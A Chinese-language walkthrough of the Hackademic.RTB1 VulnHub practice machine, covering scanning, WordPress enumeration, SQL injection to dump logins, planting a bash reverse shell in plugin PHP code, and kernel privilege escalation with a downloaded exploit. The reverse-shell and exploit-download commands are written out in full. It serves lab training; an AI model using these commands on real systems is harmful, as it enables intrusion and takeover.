Hackademic.RTB1靶场实战【超详细】

靶机下载链接:https://download.vulnhub.com/hackademic/Hackademic.RTB1.zip

一、主机探测和端口扫描

复制代码
nmap 192.168.121.0/24

ip:192.168.121.196

端口:22、80

二、访问80端口

发现target可点击

点击后跳转,页面提示目标是读取到 key.txt 文件

findsomething插件 查看网站的js接口

拼接 /Hackademic_RTB1/?feed=rss 看到 wordpress 版本

三、目录扫描

复制代码
dirb http://192.168.121.196/

前面发现为 wordpress,kali 使用 wpscan 扫描网站

复制代码
wpscan --url  http://192.168.121.196

其中发现了一个路径 http://192.168.23.143/Hackademic_RTB1/wp-content/themes/starburst/style.css

可以看到 wp-content 位置,尝试将其修改为 wordpress的默认路径wp-admin,发现后台登录页面

使用 wpscan 扫描用户

使用 cewl 爬取网站密码文本

复制代码
cewl 192.168.121.196 -w pass.txt

密码未能成功爆破

我们回到findsomething中,发现url中携带参数

可以进行sql注入

首先测cat参数,发现存在sql注入

dump 下数据,获取账号密码

挨个登录,登录GeorgeMiller发现插件里面能直接修改php代码,我们添加phpinfo,发现成功解析

四、get shell

复制代码
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.121.171/4444 0>&1'");

kali开启监听,访问hello.php文件,成功反弹shell

五、提权

使用 python 启用交互式shell

复制代码
sudo -l

查看当前权限,发现需要密码

查看内核版本

复制代码
uname -a

搜一下相关版本的提权漏洞

复制代码
searchsploit linux kernel 2.6.3

排除一些其他 linux 操作系统,精确版本,尝试后发现 15285.c 可利用

复制代码
searchsploit -m 15285

开启一个临时 web 服务,靶机将其下载到 tmp 目录下

复制代码
python3 -m http.server

wget http://192.168.121.171:8000/15285.c

进行编译后,执行文件,提权成功

复制代码
gcc 15285.c -o 15285
./15285
相关推荐
网硕互联的小客服1 小时前
未来趋势:AI与量子计算对服务器安全的影响
运维·服务器·网络·网络安全·量子计算
玥轩_5212 小时前
BUUCTF [WUSTCTF2020]spaceclub 1
安全·网络安全·ctf·buuctf·ascii·spaceclub·wustctf2020
ManageEngine卓豪2 小时前
网络工具如何帮助消除网络安全风险
网络安全·网络管理·网络工具
码农12138号9 小时前
BUUCTF在线评测-练习场-WebCTF习题[GXYCTF2019]BabyUpload1-flag获取、解析
web安全·网络安全·文件上传漏洞·buuctf·解析漏洞
Johny_Zhao9 小时前
Docker + CentOS 部署 Zookeeper 集群 + Kubernetes Operator 自动化运维方案
linux·网络安全·docker·信息安全·zookeeper·kubernetes·云计算·系统运维
独行soc15 小时前
#渗透测试#批量漏洞挖掘#HSC Mailinspector 任意文件读取漏洞(CVE-2024-34470)
linux·科技·安全·网络安全·面试·渗透测试
Whoisshutiao17 小时前
网安-XSS-pikachu
前端·安全·网络安全
游戏开发爱好者81 天前
iOS重构期调试实战:架构升级中的性能与数据保障策略
websocket·网络协议·tcp/ip·http·网络安全·https·udp
安全系统学习1 天前
系统安全之大模型案例分析
前端·安全·web安全·网络安全·xss
A5rZ2 天前
Puppeteer 相关漏洞-- Google 2025 Sourceless
网络安全